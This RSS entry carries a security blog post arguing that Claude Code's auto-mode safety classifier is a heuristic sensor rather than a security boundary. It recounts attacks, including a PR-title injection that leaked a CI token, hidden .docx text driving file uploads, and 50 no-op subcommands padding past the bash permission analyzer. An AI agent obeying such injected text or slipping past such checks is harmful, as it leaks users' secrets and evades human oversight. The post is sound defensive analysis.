<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Claude-Code on Markus Hupfauer</title>
    <link>https://hupfauer.one/tags/claude-code/</link>
    <description>Recent content in Claude-Code on Markus Hupfauer</description>
    <image>
      <title>Markus Hupfauer</title>
      <url>https://hupfauer.one/og-default.png</url>
      <link>https://hupfauer.one/og-default.png</link>
    </image>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Sun, 17 May 2026 20:00:00 +0200</lastBuildDate>
    <atom:link href="https://hupfauer.one/tags/claude-code/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Auto mode is a sensor too</title>
      <link>https://hupfauer.one/posts/auto-mode-is-a-sensor-too/</link>
      <pubDate>Sun, 17 May 2026 20:00:00 +0200</pubDate>
      <guid>https://hupfauer.one/posts/auto-mode-is-a-sensor-too/</guid>
      <description>Claude Code&amp;#39;s auto mode replaces a manual flag with a classifier that decides which tool calls are safe. That is useful. It is not a security boundary, for the same reason input-side prompt-injection detection is not.</description>
      <content:encoded><![CDATA[<p>In <a href="/posts/identity-is-the-control-plane/">the first post</a> I argued that prompt-injection detection is a sensor on one input channel, and the real decisive control for agentic systems is identity scoping. In <a href="/posts/salting-your-own-well/">the second</a> I argued the symmetric case — defensive prompt injection is also a sensor, useful as a tripwire, dangerous as a wall. This is the third instance of the same problem shape, now installed on every developer&rsquo;s laptop: the auto-accept loop in agentic coding tools, specifically Claude Code&rsquo;s auto mode and its cousins.</p>
<h2 id="the-pitch">The pitch</h2>
<p>Auto mode is presented, fairly, as the responsible replacement for <code>--dangerously-skip-permissions</code>. The old flag suppressed every permission prompt unconditionally; the new mode keeps a model in the loop. Before each tool call, a dedicated safety classifier reviews the action. Safe actions execute without bothering the developer; risky ones are blocked or escalated; a session that accumulates three consecutive denials or twenty total stops and asks for a human. There is also a return-side check: when a subagent finishes, the classifier reviews its action history before the result is passed back to the orchestrator, on the assumption that a benign delegation could have been hijacked mid-run by injected content.</p>
<p>This is a real engineering improvement over the unconditional flag. The classifier catches some real harm. The denial counter catches some classes of stuck loops. None of that is the problem.</p>
<h2 id="the-mistake">The mistake</h2>
<p>The pitch quietly upgrades a <em>heuristic policy engine</em> into a <em>security boundary</em>. To be fair to the implementation, that engine is more than a single classifier — it includes policy code, allow/deny lists, structured tool schemas, and (in some configurations) deterministic guards like path restrictions or command parsing, alongside the learned components. But the composition does not save it. The sharper claim is the one to argue: <em>a composed decision layer with learned components is not a reliable authorization boundary when the attacker controls part of the input</em>. The classifier and its surrounding scaffolding are good enough, often enough, that the developer stops watching. That is the entire feature. And the moment the developer stops watching, the system property &ldquo;human reviews destructive actions&rdquo; silently becomes &ldquo;heuristic policy engine reviews destructive actions, then a model decides what to do next.&rdquo;</p>
<p>The published failures in agentic coding tools cluster into three categories. Auto mode partially addresses the first two and structurally cannot address the third:</p>
<p><strong>1. Prompt injection through legitimate content channels.</strong> The attacker controls <em>some</em> inputs the agent will read — a PR title, a document body, a tool result — and the system collapses the boundary between data and instruction.</p>
<ul>
<li>A security researcher put a crafted instruction in a pull request title and the Claude Code Security Review GitHub Action posted a sensitive token to the PR; the same shape of attack reportedly worked against Gemini CLI Action and GitHub Copilot Agent in similar configurations. The exact secret leaked depends on which token the action was configured with — the lesson is not &ldquo;Anthropic API key leaked&rdquo; specifically but &ldquo;agent running with whatever credential CI handed it does whatever the PR title says.&rdquo;</li>
<li>Hidden text in a <code>.docx</code> (1-point, white-on-white, invisible to a human reader, parsed cleanly by the model) has been used to make a coding agent upload local files through an allowlisted API endpoint.</li>
</ul>
<p><strong>2. Implementation bugs in the policy layer.</strong> The decision engine has parser or threshold flaws an attacker can exploit. Notably, these do not always <em>bypass to silent execution</em> — sometimes they <em>degrade to prompt</em> instead, which is a subtler failure mode worth distinguishing.</p>
<ul>
<li>The 50-subcommand cap in Claude Code&rsquo;s bash permission analyzer. Past the limit, the agent fell back to <em>ask the user</em> rather than <em>deny</em>. Adversa demonstrated this with 50 no-ops followed by a <code>curl</code>; patched in v2.1.90. This is genuinely not a &ldquo;classifier bypass to execution&rdquo; — it is an attention attack on the human. Which still works, because asking a developer who turned on auto mode is asking the wrong person.</li>
</ul>
<p><strong>3. Overprivileged runtime — the part auto mode does not fix.</strong> Malicious skills, compromised MCP servers, and packages that load instructions into context. Snyk&rsquo;s <em>ToxicSkills</em> survey reported prompt injection in roughly a third of the agent skills it sampled (sample-dependent, but directionally consistent with other supply-chain studies); coordinated campaigns have distributed malicious skills through community hubs. Anything the agent loads into context becomes an instruction channel by default; some systems preserve data/instruction separation more carefully than others, but in the typical case the boundary is thin. A classifier reviewing actions cannot retroactively un-load the prompt that shaped them.</p>
<p>Categories 1 and 2 are arms races at the input layer — patched monthly, reappearing monthly, the defender can keep running. Category 3 is a different kind of race: supply-chain and provenance work that runs in parallel and never quite finishes. What it is not is something the auto-mode classifier can decide. Ambient authority granted at install time is not revoked by inspecting the tool call later.</p>
<h2 id="who-bears-the-cognitive-load">Who bears the cognitive load</h2>
<p>The honest read of auto mode is about cognitive load. The original design — permission prompt for every action — put the load on the human, predictably produced alert fatigue, and trained developers to click yes. Auto mode shifts the load: the model bears it on the easy cases, the human is summoned only for the hard ones. As a UX improvement that is genuine. As a security claim it depends on a property that is hard to establish — that &ldquo;the hard cases&rdquo; the human will be summoned for include the irreversible ones, reliably, under adversarial input.</p>
<p>That property is the one the bypasses above keep falsifying. So the more useful framing is not about motive but about a predictable consequence: when the model bears the routine cognitive load on tool calls, the human stops developing a calibrated sense of what the agent is doing. The trust gradient that used to come from clicking yes a hundred times — and occasionally clicking no — flattens out. The first irreversible action a developer actually has to evaluate, they evaluate cold.</p>
<p>Worth saying explicitly as an intuition pump, not as evidence: a reasonably competent, non-malicious employee does not <code>terraform destroy</code> the production tenant because a chatbot suggested it. They hesitate, check the subscription, ask a colleague. An agent in auto mode hesitates less than a human and acts faster than the human can read the proposal. The relevant property is not whose headline error rate is higher. It is that the human&rsquo;s failure mode includes friction — second-guessing, asking around, the small delays that catch the obviously-wrong action on the way out — and the agent&rsquo;s does not. Auto mode optimizes those frictions away on the routine path, which is exactly the path the adversarial input was crafted to ride.</p>
<p>The uncomfortable shape of the problem: the only honest solutions to &ldquo;agent with standing privilege taking irreversible actions on adversarial input&rdquo; are (a) genuinely shrink the agent&rsquo;s standing privilege so the dangerous actions become structurally unavailable, or (b) genuinely review the irreversible ones. Auto mode does neither. Each individual design decision in it is reasonable. Together they shift load away from the human in exactly the place where the human&rsquo;s slowness was the feature.</p>
<h2 id="where-this-lands-in-the-trilogy">Where this lands in the trilogy</h2>
<p>The agent runs with your shell, your repo, your dependencies, your secrets, your CI tokens, and a license to type. Other layers exist in principle — OS permissions, repo ACLs, container boundaries, network egress policy, cloud IAM, enterprise EDR — and on a hardened setup they are meaningful. In the default developer workflow they are typically configured at coarser granularity than a single agent action: a credential that exists at all is a credential the agent can use. The policy engine is the gate that actually decides per-action; the layers around it decide what the agent <em>could</em> do in principle, not what it does this turn.</p>
<p>Different environments give you different amounts of leverage. Roughly:</p>
<table>
  <thead>
      <tr>
          <th>Environment</th>
          <th>Enforceable controls</th>
          <th>Where auto mode actually fits</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Local laptop</td>
          <td>Container, ephemeral working dir, opt-in egress, non-user UID</td>
          <td>Convenience layer inside the sandbox</td>
      </tr>
      <tr>
          <td>CI / repo agent</td>
          <td>Short-lived OIDC tokens, branch protections, secret scoping</td>
          <td>Should not exist for irreversible actions on <code>main</code></td>
      </tr>
      <tr>
          <td>Remote dev container</td>
          <td>Same as local + tighter network policy, no host credentials</td>
          <td>Reasonable default for routine edits</td>
      </tr>
      <tr>
          <td>Plugin / skill / MCP</td>
          <td>Per-source provenance, capability-style permissions, no implicit secret access</td>
          <td>Auto mode does not address this layer at all</td>
      </tr>
  </tbody>
</table>
<p>A concrete minimum for a local setup that actually constrains the agent rather than relying on the classifier: run the agent in a container under a non-user UID, with the working tree mounted, the host home directory not mounted, network egress allowlisted, and any cloud credential delivered through a per-task short-lived token rather than a long-lived file. That is the shape of &ldquo;the call fails before the classifier matters&rdquo; — and it is unglamorous enough that almost no one ships it by default.</p>
<p>This is not an argument against auto mode. Auto mode is genuinely useful, and the manual-permission-prompt loop has its own failure mode — alert fatigue produces exactly the same &ldquo;click yes to everything&rdquo; outcome with worse UX. The argument is that auto mode is a <em>sensor and a convenience</em>, not a control, and treating it as a control is the same mistake the industry already made with input-side detection and the same mistake defenders are about to make with defensive prompt injection.</p>
<p>The controls that hold up are unglamorous and run in the same direction the trilogy has been pointing all along:</p>
<ul>
<li><strong>Scope the agent&rsquo;s identity, not its behavior.</strong> Run the agent under a credential that cannot read <code>~/.aws/credentials</code>, cannot push to <code>main</code>, cannot publish packages, cannot exfiltrate to non-allowlisted destinations. If the model proposes the bad action, the call fails before the classifier matters.</li>
<li><strong>Sandbox the blast radius.</strong> The minimum architecture from above — container, non-user UID, no host home, allowlisted egress, per-task short-lived credentials. The classifier becomes a useful early-warning sensor inside that sandbox; outside it, an apology in advance.</li>
<li><strong>Keep the human in the loop on irreversible actions specifically.</strong> Auto mode is fine for &ldquo;edit this file&rdquo; and &ldquo;run this test.&rdquo; It is not fine for <code>git push --force</code>, <code>aws s3 rm</code>, <code>npm publish</code>, <code>gh secret set</code>, or anything that touches a system you cannot reset. The right granularity is by-blast-radius, not by-classifier-confidence.</li>
</ul>
<p>The bumper sticker, for the third time: <em>the model can refuse the bad action, or fail to. Identity, scope, and sandbox decide whether the refusal matters.</em> Auto mode does not change that. It just makes it cheaper to forget.</p>
]]></content:encoded>
    </item>
  </channel>
</rss>
